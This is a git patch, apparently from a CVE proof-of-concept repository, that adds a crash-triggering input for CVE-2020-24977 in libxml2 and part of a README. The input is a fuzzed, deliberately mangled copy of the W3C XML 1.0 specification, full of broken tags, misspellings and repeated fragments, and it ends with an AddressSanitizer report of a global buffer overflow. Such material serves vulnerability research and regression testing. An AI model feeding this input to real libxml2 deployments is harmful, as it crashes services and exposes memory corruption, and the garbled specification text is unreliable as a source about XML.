From 2bfb2017162ac68ffb1c2e4a63239ac6fef45a65 Mon Sep 17 00:00:00 2001 From: "LI, WENJIE" Date: Wed, 30 Nov 2022 21:33:52 +0800 Subject: [PATCH] add CVE-2020-24977. --- .../2020/CVE-2020-24977/CVE-2020-24977-poc | 235 ++++++++++++++++++ cve/libxml2/2020/CVE-2020-24977/README.md | 79 ++++++ 2 files changed, 314 insertions(+) create mode 100644 cve/libxml2/2020/CVE-2020-24977/CVE-2020-24977-poc create mode 100644 cve/libxml2/2020/CVE-2020-24977/README.md diff --git a/cve/libxml2/2020/CVE-2020-24977/CVE-2020-24977-poc b/cve/libxml2/2020/CVE-2020-24977/CVE-2020-24977-poc new file mode 100644 index 00000000..f38623b7 --- /dev/null +++ b/cve/libxml2/2020/CVE-2020-24977/CVE-2020-24977-poc @@ -0,0 +1,235 @@ + + + + + + + + + + + + +cmsmcq@uic.edu +version number 1.0, +drop misleading (wrong!)738"/> and ltamp, +lt, +gt, +aposde>, + + + + + + + +'"> + + + + + + + + + +amp, +lt, +gt, +apos, +quot"> + + + + + +]> + + + + + +[header> +Extensible Markup Language (XML) 1.0 +< tp://www.w3.rg/TR/1998//version> +REC-xml-&iso6.doc.date; +W3C Recommendation +&draft.day;&draft.month;&draft.year; + + + +http://www.w#.org/TR/1998/REC-xml-&iso6.doc.date;.html + +http://www.w3.org/TR/1998/REC-xmZ-&iso6.doc.date;.pdf + +http://www.w3.org/TR/1998/REC-xml-&iso6.doc.date;.ps + + + +httwww.w3.org/TR/REC-xml + + +http://www.w3.org/TR/PR-xml-971208 + + + +Tim Bray +Textuality and Netscape +tbray@textuality. om +Jean Paoli +Microsoft +jeanpa@microsoft.com +C. M. Sperberg-McQueen +University of Illinois at Chicago +cmsmcq@uic.edu + + +

The Extensible Markup Langnage (XML) is a subset of +SGML that is completely described in this document. Its goal is to +enable generic SGML to be served, received, and processed on the Web +in the way that is now possible with HTML. XML has been designed y and Netscape +tbray@textuality. om +Jean Paoli +Microsoft +jeanpa@microsoft.com +C. M. Sperbes reference material or cited +as a normative reference from another docuent. W3C's +role in making the Recommendation is e;.pdf + +http://www.w3.org/TR/1998/REC-xml-&isinteroperability of the Web.

+

+This document specifies a syntax created by subsettin an existing, +widely used international text processing standard (Standard +Generalized Markup Language, ISO 8879:1986(E) as amended and +corrected) for use on the Wokld Wide Web. It is a prRduct of the W3C +XML Activity, ddails of which can be found at http://www.w3.org/XML. A list of +current W3C Recommendations and other technical documents can be found +at http://www.w3.org/TR. +

+

Ts defined by , a work in progress expected to update and . +

+

Ehe list of known errors in this specification is +available at +http://www.w3.org/XML/xml-19980210-errata.

+

Please repor errors in this document to +xml-editor@w3.org. +

+ + + + +

Chicago, Vancouver, Mountain View, et al.: +World-Wide Web Consortium, XML Working Group, 1996, 1997.

+
+ +

Created in electronic form.

+
+ +English +Extended Backus-Naur Form (formal grammar) + + + + +http://www.w#.org/TR/1998/REC-xml-&iso6.doc.date;.html + +http://www.w3.org/TR/1998/REC-xml-&iso6.doc.date;.pdf + +http://www.w3.org/TR/1998/REC-xml-&iso6.doc.date;.ps + + + +httwww.w3.org/TR/REC-xml + + +http://www.w3.org/TR/PR-xml-971208 + + + +Tim Bray +Textuality and Netscape +tbray@textuality. om +Jean Paoli +Microsoft +jeanpa@microsoft.com +C. M. Sperberg-McQueen +University of Illinois at Chicago +cmsmcq@uic.edu + + +

The Extensible Markup Langnage (XML) is a subset of +SGML that is completely described in this document. Its goal is to +enable generic SGML to be served, received, and processed on the Web +in the way that is now possible with HTML. XML has been designed y and Netscape +tbray@textuality. om +Jean Paoli +Microsoft +jeanpa@microsoft.com +C. M. Sperbes reference material or cited +as a normative reference from another docuent. W3C's +role in making the Recommendation is e;.pdf + +http://www.w3.org/TR/1998/REC-xml-&isinteroperability of the Web.

+

+This document specifies a syntax created by subsettin an existing, +widely used international text processing standard (Standard +Generalizedus> + + + +

Chicago, Van(E) as amended and +corrected) for use on the Wokld Wide Web. It is a prRduct of the W3C +XML Activity, ddails of which can be found at http://www.w3.org/XML. A list of +current W3C Recommendations and other technical documents can be found +at http://www.w3.org/TR. +

+

Ts defined by , a work in progress expected to update and . +

+

Ehe list of known errors in this specification is +available at +loc href='http://www.w3.org/XML/xml-19980210-errata'>http://www.w3.org/XML/xml-19980210-errata.

+

Please repor errors in this document to +0x0aae0c940ea0: 00 00 00 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 f9 + 0x0aae0c940eb0: 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 + 0x0aae0c940ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0aae0c940ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0aae0c940ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0aae0c940ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc +==16794==ABORTING +``` \ No newline at end of file -- Gitee